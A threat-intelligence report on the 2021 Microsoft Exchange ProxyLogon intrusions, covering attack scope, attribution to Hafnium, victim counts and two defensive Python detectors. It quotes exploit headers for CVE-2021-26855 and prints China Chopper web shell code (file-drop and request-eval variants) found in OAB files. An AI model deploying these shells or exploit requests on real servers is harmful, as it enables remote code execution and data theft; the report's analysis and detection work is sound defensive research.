Updated December 24, 2021.
Executive Summary
Microsoft recently revealed that its Microsoft Exchange email service was the target of a successful cyberattack. The SecurityScorecard Investigations & Analysis team analyzed the incident to understand the scope and impact of the attack, learn more about the threat actors, and identify potential victims.
Although initially thought to have affected as many as 30,000-100,000 organizations, our analysis indicates that the number is far lower. Scanning the internet with our proprietary technology for vulnerable, public-facing Microsoft Exchange servers revealed 2,500-18,000 vulnerable public-facing servers worldwide, a majority of which are in Europe, the Middle East, and Africa (EMEA). However, the vast majority of the victims were located in the United States and Germany, demonstrating a strong degree of intentionality by the perpetrators.
While our investigation is still ongoing, to date we have identified 302 unique organizations that were impacted across 10 different industry sectors. Nevertheless, despite the announcement of this intrusion, as of March 15, 2021, failure to install the necessary patch has left over 2,500 servers still vulnerable.
Other published assessments, based on open source information, have concluded that the primary adversary for this attack is Hafnium, a Chinese advanced persistent threat (APT) group. Our analysis confirms that the initial proof of concept exploit code was written by Chinese speakers; however, we are unable to confirm at this time whether the perpetrators are positively associated with Hafnium.
Background
A cyber threat group, identified by Microsoft as Hafnium, conducted a major cyber offensive operation between early January and March 6, 2021. This operation targeted Microsoft® Exchange servers using several 0-day, or previously unknown, vulnerabilities that enabled the attackers to execute remote code to manipulate the victim’s systems.
The SecurityScorecard Investigations & Analysis team analyzed the incident to understand the scope and impact of the attack, learn more about the threat actors, and identify any potential victims.
Key Findings
- Discovery of ‘in the wild’ exploit code written by Chinese-speaking authors on GitHub. These exploits give the attacker the ability to dump the email contents of the Exchange Server.
- Despite early reports of 30-100,000 victims, we were only able to observe approximately 18,000 public-facing vulnerable servers, including instances of Outlook Web Access that are usually linked to internal Exchange servers. We are unable to explain the discrepancy without knowing more about the data upon which the original reporting relied.
- While the majority of vulnerabilities were found in Europe, the Middle East, and Africa, the majority of victims were found in the United States with a similar number in Germany.
- We were able to identify 302 compromised organizations in at least 10 different industry sectors. We managed to deduce the identity of 173 organizations. As a matter of policy, we do not name victims of attacks.
- We found evidence that may indicate more than one attacker at work in the victims’ systems, as it appears other cyber threats are rushing to exploit the vulnerabilities.


Vulnerability Analysis
The vulnerabilities identified in this attack include CVE-2021-26857, CVE-2021-27065 & CVE-2021-26855. These vulnerabilities are part of an exploitation chain that when executed successfully in succession allows the attacker to conduct remote code execution within the victim’s Microsoft Exchange server, enabling additional intrusions inside the network.
In this case, we found evidence that China Chopper was being dropped on exploited systems via these vulnerabilities. We dug a little deeper to see if we could uncover the origins of these vulnerabilities. We were able to find evidence that proof of concept code had been developed to utilize these exploits.
Exploit Code Discovery
During our investigation, we looked for the existence of exploit code using these CVEs in the wild. We found discussions in social media and forum chatter about using CVE-2021-26855 to dump the contents of email.


Fig 1. Twitter posting (note screenshots have Chinese characters in them).
This led to identifying individual GitHub accounts posting just this sort of code. The author associated with one account developed the original exploit code for CVE-2021-26855 written in GoLang. The other author created tools to dump the contents of email from Exchange servers. We were able to connect these accounts to two Chinese-speaking authors.


Fig 1.2 GitHub account belonging to author of email dumping Proof Of Concept
Proof of concept code that utilized these specific vulnerabilities has been discussed in places such as CVEBase. The exploit code repository was taken down; however, other GitHub accounts are making reference to GreyOrder being the original author. We were able to find the original post by GreyOrder, even though it was deleted, through a cached reference to the post.


Fig 1.3 CVEBase


Fig 1.4 POC discussion on GitHub
The following is what was found posted from GreyOrder on March 3, 2021, only to be later removed from repositories.


Fig 1.5 Original GitHub posting for GreyOrder POC exploit
GreyOrder discloses some of the conditions to trigger the vulnerability and how this tool, written in GoLang, can be used to download the contents of email from the affected Microsoft Exchange server. In order to trigger the vulnerability, a few conditions have to exist.
- The targeted Microsoft Exchange server must be a load balancing server (two or more servers must be used at the same time).
- The FQDN of the targeted internal Microsoft Exchange server must be known. It can be captured via a NTLM type 2 message.
- For email content retrieval, the target email address must be known. Email addresses can be directly enumerated.
The general behavior of this proof of concept exploit code is outlined below.
- The script first checks if the server is vulnerable in the same way that Microsoft’s nmap script does, sending a request to https:///owa/auth/x.js with the header Cookie: X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;
- It then obtains the FQDN by sending an NTLM type 2 message to https:///ews/exchange.asmx.
- Finally, it sends XML SOAP requests to https:///ecp/temp.js with the following headers: Cookie: X-BEResource=%s/EWS/Exchange.asmx?a=~1942062522; Content-Type: text/xml


Fig 1.6 Proof of Concept Exploit Demonstration
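The request sequence outlined above leaves traces a defender can look for in the Exchange front-end (HttpProxy) logs: an unauthenticated request whose anchor mailbox carries a ServerInfo~ routing hint, which is what the X-BEResource cookie turns into on the server side, or a request for one of the probe paths named above. The following Python script is an added example, not code from the SecurityScorecard report or from Microsoft’s tooling. The log text, IP addresses and reduced column set are constructed for the example; the column names follow the real HttpProxy log header, but check them against your own logs before relying on them.

```python
import csv
import re
from dataclasses import dataclass

# Constructed sample of an Exchange HttpProxy log. The column set is abbreviated
# (real logs carry dozens of columns); the names used here follow the real header.
# Two rows model the probe sequence described in the report: an unauthenticated
# request to /owa/auth/x.js and one to /ecp/temp.js, each with a ServerInfo~
# anchor derived from the X-BEResource cookie. IPs are documentation addresses.
SAMPLE_LOG = """#Software: Microsoft Exchange Server
#Version: 15.0.0.0
#Log-type: HttpProxy Logs
#Date: 2021-03-03T10:00:00.000Z
#Fields: DateTime,UrlStem,AuthenticatedUser,AnchorMailbox,ClientIpAddress,HttpStatus
2021-03-03T10:00:01.000Z,/owa/auth/logon.aspx,,,198.51.100.7,200
2021-03-03T10:00:02.000Z,/owa/auth/x.js,,ServerInfo~localhost/owa/auth/logon.aspx?~3,203.0.113.5,200
2021-03-03T10:00:03.000Z,/ecp/temp.js,,ServerInfo~a/EWS/Exchange.asmx?a=~1942062522,203.0.113.5,200
2021-03-03T10:00:04.000Z,/ews/exchange.asmx,CORP\\alice,alice@corp.example,198.51.100.9,200
"""

# Probe paths named in the proof-of-concept walkthrough above.
PROBE_PATHS = {"/owa/auth/x.js", "/ecp/temp.js"}
# An anchor of the form "ServerInfo~<host>/<path>" on an unauthenticated request
# is the routing hint the SSRF injects through the X-BEResource cookie.
SSRF_ANCHOR = re.compile(r"^ServerInfo~[^/]+/")


@dataclass(frozen=True)
class Finding:
    timestamp: str
    client_ip: str
    url_stem: str
    rules: tuple


def parse_httpproxy_log(text):
    """Return one dict per data row, keyed by the names from the '#Fields:' header."""
    fields = None
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#Fields:"):
            fields = [f.strip() for f in line[len("#Fields:"):].split(",")]
            continue
        if line.startswith("#"):
            continue  # other header comments (#Software, #Date, ...)
        if fields is None:
            raise ValueError("data row encountered before the #Fields: header")
        values = next(csv.reader([line]))
        rows.append(dict(zip(fields, values)))
    return rows


def detect_ssrf_indicators(log_text):
    """Flag rows matching either indicator; one Finding per row, listing the rules hit."""
    findings = []
    for row in parse_httpproxy_log(log_text):
        rules = []
        if not row.get("AuthenticatedUser") and SSRF_ANCHOR.match(row.get("AnchorMailbox", "")):
            rules.append("unauthenticated-serverinfo-anchor")
        if row.get("UrlStem", "").lower() in PROBE_PATHS:
            rules.append("known-probe-path")
        if rules:
            findings.append(Finding(row["DateTime"], row["ClientIpAddress"],
                                    row["UrlStem"], tuple(rules)))
    return findings


def count_by_client(findings):
    """Number of flagged requests per source IP, useful for triage ordering."""
    counts = {}
    for f in findings:
        counts[f.client_ip] = counts.get(f.client_ip, 0) + 1
    return counts


if __name__ == "__main__":
    hits = detect_ssrf_indicators(SAMPLE_LOG)
    for h in hits:
        print(h.timestamp, h.client_ip, h.url_stem, ", ".join(h.rules))
    print(count_by_client(hits))
```

Run against the constructed log, the two probe rows are flagged by both rules and attributed to the same source address, while the ordinary logon and the authenticated EWS call are left alone. The anchor rule is the more robust of the two, since the probe paths are trivially changed by an attacker, whereas the ServerInfo~ anchor is produced by the server’s own routing logic.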
We discovered the GreyOrder GitHub account has existed since 2018 with little associated activity. We can assess with moderate confidence that GreyOrder developed the first proof of concept exploit code prior to the disclosure.


Fig 1.7 GreyOrder GitHub
Scope and Impact
The impact of this attack was initially reported as affecting 30,000 to 100,000 organizations running Microsoft Exchange. Our analysis assessed how many actual on-premise Exchange servers are exposed, given that Microsoft asserted in its advisory on March 2, 2021, that Exchange Online (O365) was not vulnerable. Some key points and questions we identified in our analysis follow.
- What is the total population of exposed Microsoft Exchange Servers regardless of version on the Internet during the time period of analysis? This enables us to make a general assessment about the potential attack surface.
- Microsoft released a detection script (to our collective benefit) for identifying vulnerable on-prem Microsoft Exchange servers but then proceeded to update that script twice, first adding the ability to detect Exchange 2013 installations and later to better handle service redirects (HTTP response codes 301 and 302) after receiving feedback that there were false negatives in the scanning results.
- From our analysis and scans, we believe significantly fewer than 30,000 organizations were affected. Our data shows 18,000 organizations may have been vulnerable to this attack. To date, we’ve been able to identify 302 unique organizations that were impacted.
- How many Microsoft Exchange servers still remain unpatched to CVE-2021-26855? First, we wanted to clarify that we are only able to detect servers that are vulnerable to the Server Side Request Forgery (SSRF) Vulnerability. The other vulnerabilities are dependent upon this CVE being successfully exploited to execute arbitrary code. We believe as of March 15, 2021, that over 2,500 servers are still vulnerable.
What did we see?
Threat Actor
The primary adversary for this attack according to open source information is Hafnium. According to Microsoft reporting, Hafnium is a sophisticated Chinese APT group operating against various industry sectors. While our discovery of Chinese-speaking authors of the initial proof of concept exploit code only further solidifies Microsoft’s reporting on Hafnium, we are unable to confirm at this time if those authors are positively associated with Hafnium.
Attack Surface
Using our proprietary technology to scan the Internet for public-facing Exchange servers vulnerable to CVE-2021-26855 reveals that a majority are in Europe, the Middle East, and Africa (EMEA). We focused on public-facing Exchange servers that we could confirm as still vulnerable or unpatched. We found fewer than 18,000 vulnerable public-facing servers worldwide through our research and analysis.
Discrepancy in Vulnerable Server numbers
We can’t definitively say what drove the initial reports of significantly more organizations being hacked. It may be based on internal Microsoft telemetry of Exchange servers sold, or it may include servers behind a firewall which we would not be able to observe. Our numbers represent the number of Exchange servers that we observed from the Internet which is less than 18,000. Without additional information about the data upon which those reports were based, we can only speculate as to the discrepancy. As our research continues we will update our reporting with any evidence we observe regarding these larger numbers of vulnerable servers.


Fig 1.8 Still Vulnerable Microsoft Exchange Servers CVE-2021-26855 (includes scans for outlook web access and on-premise)


Fig 1.9 Microsoft Exchange Servers exposed on the Internet (includes Outlook Web Access and on-premise)
Malware Involved
During our investigations, we focused on some of the technical aspects of the attacks, such as the malware involved. We detected several malware files known as web shells related to this attack that were tagged as exploiting CVE-2021-26855 & CVE-2021-27065, i.e., the web shells were specifically designed to be used with these vulnerabilities.
China Chopper
The adversary used the China Chopper web shell in this targeted attack.
The China Chopper web shell has two components: server-side and client-side. The client-side component is an executable with a Graphical User Interface that provides an interface with the server-side component. Unlike other web shells, which provide an HTML interface on the compromised server that the attacker can interact with by visiting the page, the China Chopper web shell shows no content when its page is visited. Therefore, the attacker needs the client-side component in order to interact with it. The client-side component provides the following capabilities on the affected server:
- file management
- database management
- virtual terminal
The server-side component is very short and simple, which makes it harder to detect. During the attacks related to the Microsoft Exchange vulnerabilities, we observed two types of China Chopper web shell.
The first type is injected in the ExternalUrl field of the OAB (Offline Address Book) files. It checks if any files were uploaded with the request and, if so, saves the file locally as an independent ASPX file.
The following example has a hardcoded ASPX file name:
- ExternalUrl: http://g/<script Language="c#" runat="server">void Page_Load(object sender, EventArgs e){if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath("<aspx_file_name>"));}}</script>
We only observed the hardcoded value of “error.aspx”. However, we also observed a use case in which the file name and file content are sent as two different HTTP parameters and the web shell saves the given content in the specified file name:
- ExternalUrl: http://g/<script runat="server">protected void Page_Load(object sender, EventArgs e){System.IO.StreamWriter sw = new System.IO.StreamWriter(Request.Form["p"], false, Encoding.Default);sw.Write(Request.Form["f"]);sw.Close();}</script>
The second example seems to be an evolution of the attack, probably in an attempt to make sure the file name is not exposed in the OAB file, to allow the attacker to upload more than one file, or to allow the attacker to randomly generate the file name.
The second type is also injected in the ExternalUrl field of the OAB files, but the injected content is different. It reads the value of an HTTP parameter and executes it on the server. An example of such a web shell is:
- http://f/<script language="JScript" runat="server">function Page_Load(){eval(Request["<parameter_name>"],"unsafe");}</script>
Since the attacker chooses the value for <aspx_file_name> in the first case and <parameter_name> in the second case, it is possible that these different approaches may indicate the presence of two different attackers.
As of the date of publication, we detected 366 variants of the web shell that contained details of the victims’ Microsoft Exchange environment. Out of the 366 web shell samples, 337 were using HTTP parameters and 28 were using individual ASPX files.
Since the web shell was injected into the OAB files which are configuration files containing information about the servers they are running on, we managed to obtain the list of domains for the infected servers. Some of them are local domains while others are public.
The following is a list of distinct HTTP parameter values we observed along with the number of unique servers the attackers managed to infect:


Fig 2 – Distribution of ChinaChopper web shell parameters
Apart from these, we observed two clusters of similarly-looking parameter names, which suggests that two attackers are generating a unique parameter name for each infected server. We observed each of these parameter names were used only once. The first cluster has parameter values that look like these: rxDg52fHL9GW, WHotfJjxFadX, EiH4yV2WGYgc, while the second one: 26c7d6bd63f345f9fea2797a57c1ac33, 2380d9e018988768600d9f3195b0095d, ce62a4a53e118ff82150522c663ddae6.
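Because the injected shells live in the ExternalUrl field, a defender can triage exported OAB configuration by looking for a server-side script block where only a URL belongs. The following Python is an added example, not code from the report: it classifies each ExternalUrl value into the two types described above (file-drop versus parameter evaluation), extracts the hard-coded file name or the parameter name, and buckets parameter names into the two naming clusters noted above (12-character alphanumeric and 32-character hex). The sample values are constructed from the shapes on the page with invented file and parameter names, and the regular expressions are this example’s own assumptions; pattern matching of this kind is a triage aid and would miss an obfuscated variant.

```python
import re
from collections import Counter
from dataclasses import dataclass

# Constructed ExternalUrl values. The first is a benign OAB URL; the others follow
# the three injected shapes described in the report, with the placeholders
# <aspx_file_name> and <parameter_name> replaced by invented values.
SAMPLE_EXTERNAL_URLS = [
    "https://mail.corp.example/OAB",
    'http://g/<script Language="c#" runat="server">void Page_Load(object sender, EventArgs e)'
    '{if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath("error.aspx"));}}</script>',
    'http://g/<script runat="server">protected void Page_Load(object sender, EventArgs e)'
    '{System.IO.StreamWriter sw = new System.IO.StreamWriter(Request.Form["p"], false, Encoding.Default);'
    'sw.Write(Request.Form["f"]);sw.Close();}</script>',
    'http://f/<script language="JScript" runat="server">function Page_Load()'
    '{eval(Request["rxDg52fHL9GW"],"unsafe");}</script>',
    'http://f/<script language="JScript" runat="server">function Page_Load()'
    '{eval(Request["26c7d6bd63f345f9fea2797a57c1ac33"],"unsafe");}</script>',
]

# A legitimate OAB URL never contains a server-side script block.
SERVER_SCRIPT = re.compile(r'<script\b[^>]*\brunat\s*=\s*"server"', re.IGNORECASE)
# Type 1: writes an uploaded file or a form field to disk.
FILE_DROP = re.compile(r"Request\.Files|StreamWriter|\.SaveAs\(", re.IGNORECASE)
HARDCODED_NAME = re.compile(r'MapPath\("([^"]+)"\)')
# Type 2: evaluates a request parameter as code.
EVAL_PARAM = re.compile(r'eval\(\s*Request\["([^"]+)"\]', re.IGNORECASE)


@dataclass(frozen=True)
class ShellHit:
    kind: str     # "file-drop" or "eval-parameter"
    detail: str   # hard-coded file name, "name-from-request", or the parameter name
    cluster: str  # naming cluster of the parameter, or "n/a" for file-drop shells


def cluster_of(name):
    """Bucket a parameter name into the two naming patterns observed on the page."""
    if re.fullmatch(r"[0-9a-f]{32}", name):
        return "hex32"
    if re.fullmatch(r"[A-Za-z0-9]{12}", name):
        return "random12"
    return "other"


def classify_external_url(url):
    """Return None for a clean URL, otherwise a ShellHit describing the injected shell."""
    if not SERVER_SCRIPT.search(url):
        return None
    m = EVAL_PARAM.search(url)
    if m:
        return ShellHit("eval-parameter", m.group(1), cluster_of(m.group(1)))
    if FILE_DROP.search(url):
        h = HARDCODED_NAME.search(url)
        return ShellHit("file-drop", h.group(1) if h else "name-from-request", "n/a")
    return ShellHit("unknown-server-script", "", "n/a")


def summarize(urls):
    """Count hits by kind, mirroring the page's parameter-vs-ASPX-file split."""
    return dict(Counter(h.kind for h in map(classify_external_url, urls) if h))


if __name__ == "__main__":
    for url in SAMPLE_EXTERNAL_URLS:
        print(classify_external_url(url))
    print(summarize(SAMPLE_EXTERNAL_URLS))
```

The unknown-server-script outcome is deliberate: any script block in an ExternalUrl is worth a human look even when it matches neither known shape, so the classifier never returns None once a runat="server" block is present.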
A full example of an infected OAB file from an infected Microsoft Exchange server follows:


Full OAB file
Victimology
One objective of the analysis was to understand the victimology of this attack and determine if it aligns with a typical nation-state cyber offensive operation. We started with analyzing the discovered web shells and their capabilities, then we focused on identifying victims. Most of the web shells were modified versions of the China Chopper web shell repurposed for this attack. The OAB files containing the web shells were initially created in 2013, 2014, 2016, and 2017, with the last modification date of March 5, 2021. The last modification date might suggest the time at which the web shell was added to the OAB files. Additional research into the web shell dropped on compromised assets post-exploitation revealed some victim identities. From our research, we discovered 366 web shells (302 of which were unique) that contained detailed information about victim Exchange environments. We were able to identify at least 173 unique organizations that had been compromised as a result of this vulnerability in their public-facing Exchange servers. The overwhelming majority of victims are in the United States and Germany. This shows the intentionality of the attacker, especially considering that the vulnerability was predominantly in EMEA.


Fig 2.1 Distribution of web shell Victims
While a full analysis of identified victims is still ongoing, we have been able to identify a partial list of sectors of victimized organizations found to have been targeted by the China Chopper web shell. We plan on updating this research in the future.


Fig 2.2 Sector Victimology
We found cases in which the domains for the URLs specified in the OAB files are local and we wonder whether this means that there are infected Microsoft Exchange servers that are not publicly exposed to the Internet.
Other web shells
In addition to China Chopper, we discovered other web shell code designed to check if products from FireEye®, CrowdStrike®, and CarbonBlack® are present. The code writes a response back depending on which condition is true (see below: if "fireeye" is found, write 1; if "confer" (CarbonBlack) is found, write 2; if "crowdstrike" is found, write 3). We believe the attacker is likely collecting this information in an effort to understand victim environmental details. This web shell would allow additional malware to be deployed to terminate the security software.


0ba9a76f55aaa495670d74d21850d0155ff5d6a5
The presence of this functionality demonstrates not only intentionality but sophistication that would elevate this attack beyond what a cyber crime group would be interested in conducting.
Analysis of Competing Hypotheses
The analysis of competing hypotheses, also known as ACH, is an intelligence analytical model intended to rank evidence against plausible scenarios. Each hypothesis is scored against the available evidence, which either supports or does not support that specific hypothesis.
Hypotheses | Evidence that supports | Evidence that disproves
30,000 to 100,000 Microsoft Exchange servers are compromised | |
GreyOrder is a member of Hafnium | |
Techniques, Tactics & Procedures support a Nation State cyber offensive operation | |
Conclusion
While our research into this intrusion is continuing, we believe that our initial findings support, but do not confirm, Microsoft’s attribution to a Chinese APT group known as Hafnium. From our research we believe the authors of related proof of concept code were Chinese-speaking; the attackers targeted organizations primarily in the United States and Germany; the initial group of sectors is similar to those sectors previously targeted by Hafnium; and the attacker demonstrated sophistication in maintaining persistence within the victim’s network. While the vulnerability may be currently being exploited by ransomware criminals we believe the original attack was the work of a nation-state actor. Our research is ongoing and will be updated as appropriate.

